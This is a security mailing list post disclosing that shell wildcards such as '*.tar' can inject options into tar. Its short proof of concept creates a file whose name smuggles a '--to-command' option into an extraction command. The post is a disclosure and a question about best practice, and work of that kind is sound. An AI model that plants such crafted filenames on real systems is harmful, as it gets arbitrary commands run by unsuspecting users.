Date: Mon, 9 Dec 2019 15:23:16 +0200 From: Georgi Guninski <gguninski@...il.com> To: oss-security@...ts.openwall.com Subject: Shell wildcards considered dangerous? Remote version of this affects wu-ftpd from 2003: https://www.debian.org/security/2003/dsa-377 Summary: For trusted command PROGRAM, executing PROGRAM *.EXT may lead to arbitrary code execution, e.g. for PROGRAM=EXT=tar The main idea is the wildcard to add program options. Open problem: Are popular programs other than tar vulnerable? Since shell wildcards are unlikely to change, should best practice include not using *.EXT in shell? Example exploit vector: starting program in untrusted directories. Poc: ==== $rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue $ : > --to-command="yes .tar" #end creating, starts PoC tar xf *.tar #.tar (repeats) ==== -- CV: https://j.ludost.net/resumegg.pdf site: http://www.guninski.com blog: https://j.ludost.net/blog
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.